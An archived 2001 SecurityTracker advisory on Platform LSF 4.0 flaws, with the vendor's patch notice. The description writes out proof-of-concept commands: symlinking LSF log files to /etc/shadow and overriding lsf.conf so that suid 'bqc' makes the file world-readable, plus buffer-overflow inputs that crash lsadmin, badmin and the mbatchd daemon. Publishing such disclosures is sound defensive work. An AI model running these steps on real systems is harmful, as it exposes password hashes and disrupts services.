SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   Platform LSF Vendors:   Platform Computing Inc.
(Vendor Issues Patch) Re: Platform Computing's Platform LSF Load Sharing Application Contains Multiple Flaws, Disclosing Files to Local Users, Giving Local Users Root Access, and Crashing When Remote Users Send Malformed Packets
SecurityTracker Alert ID:  1002966
SecurityTracker URL:  http://securitytracker.com/id/1002966
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Dec 13 2001
Impact:   Denial of service via network, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via local system, Modification of system information, Modification of user information, Root access via local system
Fix Available:  Yes  Vendor Confirmed:  Yes  
Version(s): 4.0
Description:   Several vulnerabilities have been reported in Platform Computing's Platform LSF load sharing facility software. These flaws include buffer overflows and unsafe use of temporary files.

A local user can read any file on the system in the default configuration due to the lack of file and symlink checking when writing to log files. A local user can create a symlink from a log file name in the /tmp directory. When LSF starts, LSF will append its log entries to the symlinked file and will change the permissions of the symlinked file to allow global read privileges.

An example symlink to allow all local users to read the /etc/shadow file is:

ln -s /etc/shadow /tmp/lim.log.hostname

Local users can also read any file on the system using another method. Because a user is given their own configuration file, the user can force some of LSF applications to do unexpected things. An example of how a symlink attack can be used in conjunction with configuration file modifications to allow a local user to read any file on the system (/etc/shadow in this example) is shown:

Change the LSF_ENVDIR so it will point to your home directory:
% setenv LSF_ENVDIR /my/home/dir

Copy LSF configuration file to your home directory:
% cp /etc/lsf.conf /my/home/dir/lsf.conf

Do the following changes in the /my/home/dir/lsf.conf:
LSB_CMD_LOGDIR=/tmp/test
LSF_LOGDIR=/tmp/test

Make a /tmp/test directory:
% mkdir /tmp/test

Do a sym-link from LSF log file to /etc/shadow:
% ln -s /etc/shadow /tmp/test/bqc.log.hostname
[ 'hostname' is your hostname ]

At this point, the user must force an LSF application that has set user id (suid) root privileges to write an entry to the log file bqc.log.hostname. 'bqc' is an appropriate application to do this and can be asked for information on a non-existent queue (dupa_zbita):

% bqc -i dupa_zbita

This will cause 'bqc' to write to its log file. Because of the user's own configuration file (/my/home/dir/lsf.conf) and the symlink, the log entry will be written to /etc/shadow and the permissions of /etc/shadow will be changed to world readable permissions.

It is reported that the 'lsadmin' and 'badmin' executables contain several exploitable buffer overflows that allow a local user to execute arbitrary code with root level privileges (as those executables have suid root permissions). The buffer overflow can be demonstrated with the following commands, which will cause a segmentation fault:

% setenv LSF_ENVDIR `perl -e 'print "A" x 292'`
% lsadmin [or badmin]

It is reported that there are other buffer overflow vulnerability in other executables.

A remote user can reportedly exploit a buffer overflow in the 'mbatchd' daemon to cause it to crash by sending specially crafted packets to the daemon. A demonstration exploit transcript is provided:

% bstatus -d AAA -J `perl -e 'print "A" x 500'`
Job <0>: XDR encode/decode error
% bjobs
batch system daemon not responding ... still trying

% tail -2 sbatchd.log.hostanme
17:18:37 2001 87317 3 4.0.1 mbatchd died with signal <11>
termination
17:18:37 2001 87317 3 4.0.1 mbatchd core dumped

[Editor's note: The author indicates that it may be possible to execute arbitrary code via this method, but that possibility is not explored in the author's report.]

The vendor has reportedly been notified.

Impact:   A local user can read any file on the system and can execute arbitrary code on the system with root level privileges. A remote user can cause the mbatchd daemon to crash.
Solution:   The vendor has released a patch, which is available at ftp.platform.com or by contacting Technical Support (support@platform.com).

The patch is currently available for LSF 4.2 on all major platforms. Patches for other platforms and versions of LSF will be made available as required.

The vendor notes that many of the issues raised in the original report were configuration issues that did not require a patch.

Vendor URL:  www.platform.com/products/wm/LSF/index.asp (Links to External Site)
Cause:   Access control error, Boundary error, State error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   This archive entry is a follow-up to the message listed below.
Dec 5 2001 Platform Computing's Platform LSF Load Sharing Application Contains Multiple Flaws, Disclosing Files to Local Users, Giving Local Users Root Access, and Crashing When Remote Users Send Malformed Packets



 Source Message Contents

Subject:  PATCH: Vulnerabilities in LSF



In-Reply-To: <Pine.LNX.4.10.10112051714250.19966-100000@apollo.aci.com.pl>

LSF users,

We now have a patch that addresses the issues raised by the security posting
of 5 December 2001.  It is available to our customers from ftp.platform.com or 
by contacting Technical Support (support@platform.com).

The patch is currently available for LSF 4.2 on all major platforms. Patches for
other platforms and versions of LSF will be made available as required.

We would also like to point out again that many of the security issues raised can be
addressed in all versions of LSF with configuration changes.  We invite you to contact
Platform Technical Support to discuss your configurations and any security concerns
that you may have.

There is also an ongoing development effort to review the security issues. We 
will continue to keep you posted about our status and any actions that are taken.
We continue to work directly with the original reporter. 

As always, your comments and feedback are welcome.

take care,

Greg

Greg L. Reid                                                          greid@platform.com
Second-line Technical Support Manager
Platform Computing Corporation
3760 14th Avenue, Markham                                Phone:(905)948-4207
Ontario, Canada, L3R 3T7                                   Cell :(416)788-4487


Platform Technical Support
--------------------------
Email: support@platform.com
Phone: (905)948-4297
Toll Free: 1-877-444-4573 

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC